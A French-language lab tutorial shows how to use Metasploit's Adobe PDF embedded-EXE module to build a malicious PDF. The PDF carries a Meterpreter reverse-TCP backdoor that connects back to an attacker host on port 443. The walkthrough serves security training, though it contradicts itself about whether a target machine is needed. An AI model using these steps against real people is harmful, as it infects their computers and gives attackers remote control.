Introduction
Dans ce laboratoire, nous allons explorer comment exploiter la vulnérabilité du module intégré dans Adobe PDF pour injecter une porte dérobée Windows. Le processus du laboratoire consiste à transmettre un fichier PDF contenant une porte dérobée à un hôte Windows, qui infectera le système Windows cible lorsque le propriétaire ouvre le fichier PDF à l'aide d'Adobe Reader.
L'environnement de laboratoire fourni par LabEx ne dispose pas de machine virtuelle Windows, nous ne pouvons donc pas vérifier l'efficacité de l'attaque. Le processus du laboratoire ne montrera que comment intégrer le programme de porte dérobée.
De plus, vous n'avez pas besoin de démarrer une machine cible dans ce laboratoire. Vous n'avez qu'à démarrer l'environnement Kali Linux, et le fichier PDF créé avec succès sera placé dans le répertoire /root/ de l'hôte Kali.
Démarrer la console du Metasploit Framework
Maintenant, vous allez démarrer la machine d'attaque (conteneur Kali Linux) et la machine cible (machine virtuelle Metasploitable2) pour l'expérience.
- Ouvrez un terminal xfce sur la machine hôte LabEx et démarrez la cible Metasploitable2 en exécutant la commande suivante :
sudo virsh start Metasploitable2
Attendez que la machine cible démarre, cela peut prendre de 1 à 3 minutes.
- Testez la connectivité à la machine cible en l'envoyant des paquets ICMP (ping) :
ping 192.168.122.102
Appuyez sur Ctrl+C pour arrêter le ping.
- Lancez le conteneur Kali Linux et entrez dans l'environnement bash en exécutant :
docker run -ti --network host b5b709a49cd5 bash
- À l'intérieur du conteneur Kali, testez la connexion réseau à la machine cible :
ping 192.168.122.102
Appuyez sur Ctrl+C pour arrêter le ping.
Maintenant, la machine d'attaque et la machine cible sont toutes deux en cours d'exécution, et vous pouvez commencer le test de pénétration.
Remarque : Si vous quittez accidentellement le bash actuel, le conteneur Kali s'arrêtera automatiquement. Vous pouvez exécuter docker run -ti --network host b5b709a49cd5 bash à nouveau sur l'hôte pour démarrer un nouveau conteneur Kali et entrer dans le bash pour continuer l'expérience.
Dans le conteneur Kali Linux, entrez les commandes suivantes dans le terminal bash de Kali Linux :
service postgresql start
msfdb init
cd ~
msfconsole
Cela démarrera le service de base de données PostgreSQL, initialisera la base de données et lancera la console du Framework Metasploit (msfconsole) pour des opérations ultérieures.
Utiliser le module d'exploitation
Dans la msfconsole, exécutez la commande suivante pour utiliser le module d'exploitation :
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Cela chargera le module d'exploitation adobe_pdf_embedded_exe, qui nous permet d'intégrer une charge utile exécutable dans un fichier PDF.
Utilisez la commande show options pour afficher les options configurables du module d'exploitation :
show options
Cela affichera les options disponibles, telles que :
EXENAME: Le chemin vers le fichier exécutable à intégrer dans le PDF.FILENAME: Le nom du fichier PDF de sortie (par défaut :evil.pdf).INFILENAME: Le chemin complet du fichier PDF d'entrée (par défaut : un fichier PDF intégré).LAUNCH_MESSAGE: Le message d'invite pour inciter l'utilisateur à exécuter l'exécutable intégré.
Vous pouvez laisser la plupart des options à leurs valeurs par défaut, mais vous pouvez souhaiter définir l'option INFILENAME pour spécifier le chemin du fichier PDF d'entrée que vous souhaitez infecter.
Après avoir configuré les options, utilisez la commande exploit pour exécuter l'attaque :
exploit
Cela intégrera la charge utile dans le fichier PDF d'entrée spécifié et générera un nouveau fichier PDF avec l'exécutable intégré.
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Examiner la sortie
Après avoir exécuté l'exploitation, le fichier PDF généré contenant la charge utile malveillante se trouvera à l'emplacement /root/.msf4/local/evil.pdf. Vous pouvez quitter la msfconsole et examiner le fichier :
ls -l /root/.msf4/local/evil.pdf
Vous devriez observer une augmentation de la taille du fichier, ce qui indique la présence de l'exécutable intégré. Lorsque le fichier PDF est ouvert, il affichera le message de lancement configuré, invitant l'utilisateur à cliquer et à exécuter le programme intégré.
Configurer une charge utile personnalisée
Pour rendre le PDF infecté plus utile, nous pouvons lui configurer une charge utile personnalisée.
Re - entrez dans la msfconsole :
cd ~
msfconsole
Dans la msfconsole, suivez les étapes précédentes pour sélectionner le module d'attaque :
use exploit/windows/fileformat/adobe_pdf_embedded_exe
Cette fois, nous allons utiliser la charge utile windows/meterpreter/reverse_tcp, qui est une porte dérobée Meterpreter établissant une connexion TCP depuis l'hôte compromis vers la machine de l'attaquant, permettant un accès direct au système compromis. Vous pouvez utiliser la commande show payloads pour afficher et sélectionner d'autres charges utiles si vous le souhaitez.
Configurez la charge utile windows/meterpreter/reverse_tcp :
set payload windows/meterpreter/reverse_tcp
Configurez la charge utile en spécifiant l'adresse IP et le port de votre hôte Kali pour recevoir la connexion entrante. Assurez - vous que l'hôte cible peut se connecter à votre hôte Kali :
set lhost 192.168.122.1
L'utilisation du port 443 peut aider à contourner certains pare - feux :
set lport 443
Ensuite, utilisez la commande exploit pour générer le PDF malveillant :
exploit
Appuyez sur Ctrl+D pour quitter la console Metasploit, puis commencez l'inspection
Examiner à nouveau la sortie
Vérifiez la taille du fichier PDF généré :
ls -l /root/.msf4/local/evil.pdf
Vous devriez remarquer que la taille du fichier est plus petite que celle avec la charge utile par défaut, car la charge utile windows/meterpreter/reverse_tcp est plus compacte.
Résumé
Dans ce laboratoire, nous avons appris à exploiter la vulnérabilité d'Adobe Reader (CVE - 2010 - 1240) qui ne valide pas le contenu intégré dans les fichiers PDF. En intégrant un programme de porte dérobée dans un fichier PDF et en incitant l'utilisateur à l'exécuter, nous pouvons accéder à l'hôte Windows cible. Les points clés abordés dans ce laboratoire sont les suivants :
- Commandes Linux de base
- Opérations dans la console du Framework Metasploit
- Présentation de la vulnérabilité Adobe PDF Embedded EXE (CVE - 2010 - 1240)
- Comment exploiter la vulnérabilité et intégrer un programme de porte dérobée
Ce laboratoire a offert une expérience pratique dans la création de fichiers PDF malveillants avec des charges utiles intégrées, la configuration de différentes options et la compréhension de l'impact de différentes charges utiles sur la taille du fichier. Cette connaissance peut être utile pour comprendre et atténuer de telles attaques dans des scénarios réels.



